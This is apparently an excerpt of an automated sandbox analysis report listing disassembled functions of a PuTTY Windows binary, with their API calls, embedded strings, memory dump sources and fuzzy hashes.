                    • Instruction Fuzzy Hash: 2CF01C36000225BBCF661FA1EC04B9E3F66FB493A5F018111FA1E96520CB32C920EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDB030 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMON
                    Download Yara Rule
                    Strings
                    • client subnegotiation: SB TTYPE IS %s, xrefs: 00BDB35F
                    • server subnegotiation: SB TTYPE SEND, xrefs: 00BDB349
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE SEND
                    • API String ID: 0-571888287
                    • Opcode ID: d94ec952149401da1c4f02b196c7b9a86e9fabf6e2d9f3511832221326fe9ce3
                    • Instruction ID: 58063697f5e8cce4a6d846fe7a06ce12336940e2531cca60fdeb892c24f2ef22
                    • Opcode Fuzzy Hash: d94ec952149401da1c4f02b196c7b9a86e9fabf6e2d9f3511832221326fe9ce3
                    • Instruction Fuzzy Hash: CCB1F170608345DFD7148F28C885F2AFBE1EB85314F6486AAE49A8B3D2E331D845D792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEE3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 00BEE490
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/unicode.c$p - mbstr < mblen
                    • API String ID: 626452242-3899250090
                    • Opcode ID: aacf1377c28fd3d4107adff29c6c0e5eb22c3c998ef898bed94baa0cc2c99916
                    • Instruction ID: 90a200a60440b24372d896d0adbc8f5fcf4d15ceb82567c0291d9bd3fe98658b
                    • Opcode Fuzzy Hash: aacf1377c28fd3d4107adff29c6c0e5eb22c3c998ef898bed94baa0cc2c99916
                    • Instruction Fuzzy Hash: 6D51E3306083819BD730DF15C885B6E77E0EF98308F1489ACF9999B381E771E944C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C10E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • false && "unhandled node type in exprnode_free", xrefs: 00C10EEE
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/cert-expr.c, xrefs: 00C10E79, 00C10EE9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/cert-expr.c$false && "unhandled node type in exprnode_free"
                    • API String ID: 4218353326-1224637189
                    • Opcode ID: a4bf35efa958c1c757a9673fd8f8aec824a88318cbfbfe1d0373ac0a3d49bc55
                    • Instruction ID: 76b7d54c088ec6557e04df7fc77971713c35f894df0665c7246f3630eabc27f4
                    • Opcode Fuzzy Hash: a4bf35efa958c1c757a9673fd8f8aec824a88318cbfbfe1d0373ac0a3d49bc55
                    • Instruction Fuzzy Hash: 79316972A006105BE7106A29EC526AEB3D6DF82330F19462EEA9587390E7719DC5E782
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD4F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BD4F35
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BD4F44
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: Event Log: %s
                    • API String ID: 601868998-1617424366
                    • Opcode ID: 5d46599007cbdb8b839625286ba298a48db9e5b7f6dc4e35b8dce10656a9c106
                    • Instruction ID: 70d01b2faf804e0d024b35293282374297e3a8d196ebd5353a74ef9cf049d036
                    • Opcode Fuzzy Hash: 5d46599007cbdb8b839625286ba298a48db9e5b7f6dc4e35b8dce10656a9c106
                    • Instruction Fuzzy Hash: 8E212875A005406FD6305724EC86B2AB7D5EF0731AF1801A6F80D86766F736A898D6E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD3040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BD30C4
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3087
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD308C
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    • Opcode ID: 59195d569ba1c32ccc11e38a13b2db151cd88aa795f4624426734cbf09a9cc5b
                    • Instruction ID: 09fb3d868498db4371e674257ea39dd6c7ed8fb00022a77f7444ab24ba3eaeaf
                    • Opcode Fuzzy Hash: 59195d569ba1c32ccc11e38a13b2db151cd88aa795f4624426734cbf09a9cc5b
                    • Instruction Fuzzy Hash: BE116670644304AFE7208B04DC95F36B3D9EF49B18F0400BEF50A873A2EB21AD40C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • c && c->ctrl->type == CTRL_RADIO, xrefs: 00BD2C83
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2C7E
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonCheckRadio
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO
                    • API String ID: 2493629399-1269695261
                    • Opcode ID: 2de3fe323635c2ab1d6cdd6112428f3621d814688d19a2b0be80f7d2c481201c
                    • Instruction ID: b67a6f3c1dd354732d1ddcbdf3cba0a3e8feca4a2d7a5e4c55a45d35b0405293
                    • Opcode Fuzzy Hash: 2de3fe323635c2ab1d6cdd6112428f3621d814688d19a2b0be80f7d2c481201c
                    • Instruction Fuzzy Hash: 53115B72A14212AFC620CF54D9C1E5AB7E8FB69708F0945AAE90497221E372BC15CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDC520 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BreakClearCloseCommHandle
                    • String ID: Error writing to serial device
                    • API String ID: 2685284230-3232346394
                    • Opcode ID: 481f1a637c408009e5983e7fb0f26c3585585c4660af05b9099bcafcb1da41a7
                    • Instruction ID: f2a88616b0eb9f785c26fdb3ed295c5ebba82c87255dfd7d997fa8742eb2de4c
                    • Opcode Fuzzy Hash: 481f1a637c408009e5983e7fb0f26c3585585c4660af05b9099bcafcb1da41a7
                    • Instruction Fuzzy Hash: 2E1163B05007019FDB20DF24EC4AB17BBE4EF15318F144A69F89A87791E731E994DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2D80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • CheckDlgButton.USER32(?,?,00000000), ref: 00BD2DF9
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2DDE
                    • c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BD2DE3
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonCheck
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                    • API String ID: 83588225-3149189057
                    • Opcode ID: 69d72465aa0b08f746825ec0405ad5d43f7ed4e4ae9def6184daa7fd1f71ba12
                    • Instruction ID: 64c3e516db30ef879daedcea9e27ddda49bb4695ce9047d487831a24918032b8
                    • Opcode Fuzzy Hash: 69d72465aa0b08f746825ec0405ad5d43f7ed4e4ae9def6184daa7fd1f71ba12
                    • Instruction Fuzzy Hash: 4F01FE35549382AFD2119F64EC41F66FBE5EF66709F0500B2F84597311E371AC14D7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2E10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • IsDlgButtonChecked.USER32(?,?), ref: 00BD2E79
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2E62
                    • c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00BD2E67
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonChecked
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                    • API String ID: 1719414920-3149189057
                    • Opcode ID: 1223b7c89a8bbe874b5110ac2549a6ef5f7f702ef4346e8a35aba344ce1a2d2f
                    • Instruction ID: 5803e54a9c93dcc57e69afbaa9c3e3b05c74f505b12bc886470b70d3c53bea5d
                    • Opcode Fuzzy Hash: 1223b7c89a8bbe874b5110ac2549a6ef5f7f702ef4346e8a35aba344ce1a2d2f
                    • Instruction Fuzzy Hash: 80F0F636640345EFD210AF64ED46F26F7E9EB59B09F0501A2F40893620F721AC54D7D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowCursor.USER32(00000001,?,?,?,?,00000000,00000000), ref: 00BB6276
                    • MessageBoxA.USER32 ref: 00BB62A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CursorMessageShow
                    • String ID: %s Error
                    • API String ID: 2689832819-1420171443
                    • Opcode ID: 70e9faa08a08d0b081c6738fded57ad640fbe64a7bb15494afb0ac902cb45c5d
                    • Instruction ID: 893bdf913e6a17d4b4cda397280f95cf3106d68cb3307eb5f5a7983f5aa867ab
                    • Opcode Fuzzy Hash: 70e9faa08a08d0b081c6738fded57ad640fbe64a7bb15494afb0ac902cb45c5d
                    • Instruction Fuzzy Hash: AA01D4F59102406FEB057B21FC0BF6F3BA4EB55354F040128F84B16292EA625858DBA3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBB0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • %s Internal Error, xrefs: 00BBB122
                    • Unsupported protocol number found, xrefs: 00BBB134
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Internal Error$Unsupported protocol number found
                    • API String ID: 2030045667-184558026
                    • Opcode ID: 6c0e1101e6d1a6fbc7981a808606b5febdbdb7495fde1e4b193c2fc320212aec
                    • Instruction ID: 3ba1d8563876d3f276f3d2ca8a180790ffa140e1e5cd291426de6928f9e2aa48
                    • Opcode Fuzzy Hash: 6c0e1101e6d1a6fbc7981a808606b5febdbdb7495fde1e4b193c2fc320212aec
                    • Instruction Fuzzy Hash: AEE02BE19542003BEB1133647C0FF7A31D88B10335F080070FD09691E3E7E29844C1A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCEAE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?, xrefs: 00BCEAF0
                    • %s Security Alert, xrefs: 00BCEB05
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Security Alert$The first %s supported by the serveris %s, which is below the configuredwarning threshold.Do you want to continue with this connection?
                    • API String ID: 2030045667-1123452757
                    • Opcode ID: d21c44b4b4fa162d9ac4f31c11d89e2928b018f403373343e9cf04ba6eec99fe
                    • Instruction ID: 00164c2f857276a8240e7ef86aff7bc49a596c0ca8b2ee14d0f66b324fc7d29e
                    • Opcode Fuzzy Hash: d21c44b4b4fa162d9ac4f31c11d89e2928b018f403373343e9cf04ba6eec99fe
                    • Instruction Fuzzy Hash: E6F090B76443406BE7002AB1BC0AF2B76D8EB99769F040478F54DE6242E66A9918C763
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCEB60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • %s Security Alert, xrefs: 00BCEB85
                    • The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne, xrefs: 00BCEB70
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Security Alert$The first host key type we have stored for this serveris %s, which is below the configured warning threshold.The server also provides the following types of host keyabove the threshold, which we do not have stored:%sDo you want to continue with this conne
                    • API String ID: 2030045667-3125611854
                    • Opcode ID: 77a0d4288ce43f6424c86afdb207ada4fa06927fe978a950bc793b7a921af69b
                    • Instruction ID: be0272a89fa519309055d41c846bae9ed4198cdbf96915dc6564bd58d0f24542
                    • Opcode Fuzzy Hash: 77a0d4288ce43f6424c86afdb207ada4fa06927fe978a950bc793b7a921af69b
                    • Instruction Fuzzy Hash: F6F096F76043406BE7002AB1BC0BF2B76D8EB98769F040478F54DE6251E66A9518C763
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCED50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • %s Log to File, xrefs: 00BCED73
                    • The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging., xrefs: 00BCED5E
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message
                    • String ID: %s Log to File$The session log file "%.*s" already exists.You can overwrite it with a new session log,append your session log to the end of it,or disable session logging for this session.Hit Yes to wipe the file, No to append to it,or Cancel to disable logging.
                    • API String ID: 2030045667-4035860868
                    • Opcode ID: 4ec9a70bf801087c66f529c6e72d0ae13ef267977af8e8364f2728103e2ea683
                    • Instruction ID: 0d8699b985cedfcdce585950edd3292355b826fc2895df0ba597817618e10d1c
                    • Opcode Fuzzy Hash: 4ec9a70bf801087c66f529c6e72d0ae13ef267977af8e8364f2728103e2ea683
                    • Instruction Fuzzy Hash: A8F0A7F7B007403BE60526B17C4BF6E36C8CB95765F040074F90A96282FA564918C663
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C16190 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c, xrefs: 00C1619F
                    • h->type == HT_INPUT, xrefs: 00C161A4
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Event
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/handle-io.c$h->type == HT_INPUT
                    • API String ID: 4201588131-1190648860
                    • Opcode ID: 7110f64193880d0cab8e6133da9bc133a9296afdc71965f5a7e40cf69ffe32cf
                    • Instruction ID: 4555ea26382089d4049f7687819103201ad78edd7194754e6eb2614b814399df
                    • Opcode Fuzzy Hash: 7110f64193880d0cab8e6133da9bc133a9296afdc71965f5a7e40cf69ffe32cf
                    • Instruction Fuzzy Hash: 27E09230808341BAE7318A24A80D3D97BF06B02319F18086DE8D6114E283B86AC8D782
                    Uniqueness

                    Uniqueness Score: -1.00%